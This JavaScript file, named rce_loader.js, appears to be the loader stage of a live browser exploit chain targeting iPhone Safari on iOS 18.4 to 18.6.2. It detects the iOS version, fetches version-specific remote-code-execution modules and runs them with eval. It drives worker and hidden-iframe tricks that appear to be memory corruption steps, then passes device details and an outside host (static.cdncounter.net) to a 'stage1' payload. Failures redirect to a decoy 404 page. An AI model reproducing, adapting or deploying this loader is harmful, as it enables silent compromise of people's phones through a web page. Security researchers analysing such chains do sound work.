/ rce_loader.js
rce_loader.js
1 var SERVER_LOG = true; 2 let logStart = new Date().getTime(); 3 let logEntryID = 0; 4 var offsets = {}; 5 var slide; 6 var chipset; 7 var device_model; 8 var localHost = "https://static.cdncounter.net/assets" 9 function print(x, reportError = false, dumphex = false) { 10 let out = ('[' + (new Date().getTime() - logStart) + 'ms] ').padEnd(10) + x; 11 if (!SERVER_LOG && !reportError) return; 12 let obj = { 13 id: logEntryID++, 14 text: out, 15 } 16 if (dumphex) { 17 obj.hex = 1 18 obj.text = x 19 } 20 //let req = Object.entries(obj).map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`).join('&') 21 //const xhr = new XMLHttpRequest(); 22 //xhr.open("GET", "/log.html?" + req , false); 23 //xhr.send(null); 24 } 25 function redirect() 26 { 27 window.location.href = "https://static.cdncounter.net/404.html"; 28 } 29 function getJS(fname,method = 'GET') 30 { 31 try 32 { 33 url = fname; 34 //(`trying to fetch ${method} from: ${url}`); 35 let xhr = new XMLHttpRequest(); 36 xhr.open("GET", `${url}` , false); 37 xhr.send(null); 38 return xhr.responseText; 39 } 40 catch(e) 41 { 42 // print("got error in getJS: " + e); 43 } 44 } 45 const signal = new Uint8Array(8); 46 const dlopen_worker = `(() => { 47 self.onmessage = function (e) { 48 const { 49 type, 50 data 51 } = e.data; 52 switch (type) { 53 case 'init': 54 const canvas = new OffscreenCanvas(1, 1); 55 globalThis[0] = data; 56 createImageBitmap(canvas).then(bitmap => { 57 globalThis[1] = bitmap; 58 self.postMessage(null); 59 }); 60 break; 61 case 'dlopen': 62 globalThis[1].close(); 63 break; 64 } 65 }; 66 })();`; 67 const dlopen_worker_blob = new Blob([dlopen_worker], { type: 'application/javascript'}); 68 const dlopen_worker_url = URL.createObjectURL(dlopen_worker_blob); 69 const ios_version = (function() { 70 let version = /iPhone OS ([0-9_]+)/g.exec(navigator.userAgent)?.[1]; 71 if (version) { 72 return version.split('_').map(part => parseInt(part)); 73 } 74 })(); 75 let workerCode = ""; 76 if(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2') 77 workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version 78 else 79 workerCode = getJS(`rce_worker_18.4.js?${Date.now()}`); // local version 80 let workerBlob = new Blob([workerCode],{type:'text/javascript'}); 81 let workerBlobUrl = URL.createObjectURL(workerBlob); 82 (() => { 83 function doRedirect() { 84 redirect(); 85 } 86 function main() { 87 const randomValues = new Uint32Array(32); 88 const begin = Date.now(); 89 const origin = location.origin; 90 const worker = new Worker(workerBlobUrl); 91 const dlopen_workers = []; 92 async function prepare_dlopen_workers() { 93 for (let i = 1; i <= 2; ++i) { 94 const worker = new Worker(dlopen_worker_url); 95 dlopen_workers.push(worker); 96 await new Promise(r => { 97 worker.postMessage({ 98 type: 'init', 99 data: 0x11111111 * i 100 }); 101 worker.onmessage = r; 102 }); 103 } 104 } 105 const iframe = document.createElement('iframe'); 106 iframe.srcdoc = ''; 107 iframe.style.height = 0; 108 iframe.style.width = 0; 109 document.body.appendChild(iframe); 110 async function message_handler(e) { 111 const data = e.data; 112 switch (data.type) { 113 case 'redirect': 114 { 115 doRedirect(); 116 break; 117 } 118 case 'prepare_dlopen_workers': 119 { 120 await prepare_dlopen_workers(); 121 worker.postMessage({ 122 type: 'dlopen_workers_prepared' 123 }); 124 break; 125 } 126 case 'trigger_dlopen1': 127 { 128 dlopen_workers[0].postMessage({ 129 type: 'dlopen' 130 }); 131 worker.postMessage({ 132 type: 'check_dlopen1' 133 }); 134 break; 135 } 136 case 'trigger_dlopen2': 137 { 138 dlopen_workers[1].postMessage({ 139 type: 'dlopen' 140 }); 141 worker.postMessage({ 142 type: 'check_dlopen2' 143 }); 144 break; 145 } 146 case 'sign_pointers': 147 { 148 iframe.contentDocument.write('1'); 149 worker.postMessage({ 150 type: 'setup_fcall' 151 }); 152 break; 153 } 154 case 'slow_fcall': 155 { 156 iframe.contentDocument.write('1'); 157 worker.postMessage({ 158 type: 'slow_fcall_done' 159 }); 160 break; 161 } 162 default: 163 { 164 break; 165 } 166 } 167 } 168 worker.onmessage = message_handler; 169 try 170 { 171 let rceCode = ""; 172 if(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2') 173 rceCode = getJS(`rce_module_18.6.js?${Date.now()}`); // local version 174 else 175 rceCode = getJS(`rce_module.js?${Date.now()}`); // local version 176 try 177 { 178 eval(rceCode); 179 } 180 catch(e) 181 { 182 //print("Got exception while running rce: " + e); 183 } 184 let desiredHost = ""; 185 desiredHost = localHost; 186 if(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2') 187 { 188 worker.postMessage({ 189 type: 'stage1_rce', 190 desiredHost, 191 randomValues, 192 SERVER_LOG 193 }); 194 } 195 else 196 { 197 var attempt = new check_attempt(); 198 attempt.start().then((result) => { 199 if(!result) 200 { 201 // print("Retrying"); 202 attempt.start().then((result) => { 203 if(!result) 204 print(""); 205 else 206 { 207 worker.postMessage({ 208 type: 'stage1', 209 begin, 210 origin, 211 ios_version, 212 offsets, 213 slide, 214 chipset, 215 device_model, 216 desiredHost, 217 SERVER_LOG 218 }); 219 } 220 }); 221 } 222 else 223 { 224 //WebViewComptability(attempt, iframe); 225 worker.postMessage({ 226 type: 'stage1', 227 begin, 228 origin, 229 ios_version, 230 offsets, 231 slide, 232 chipset, 233 device_model, 234 desiredHost, 235 SERVER_LOG 236 }); 237 } 238 }); 239 } 240 } 241 catch(e) 242 { 243 // print("Got exception on something: " + e); 244 } 245 } 246 main(); 247 })();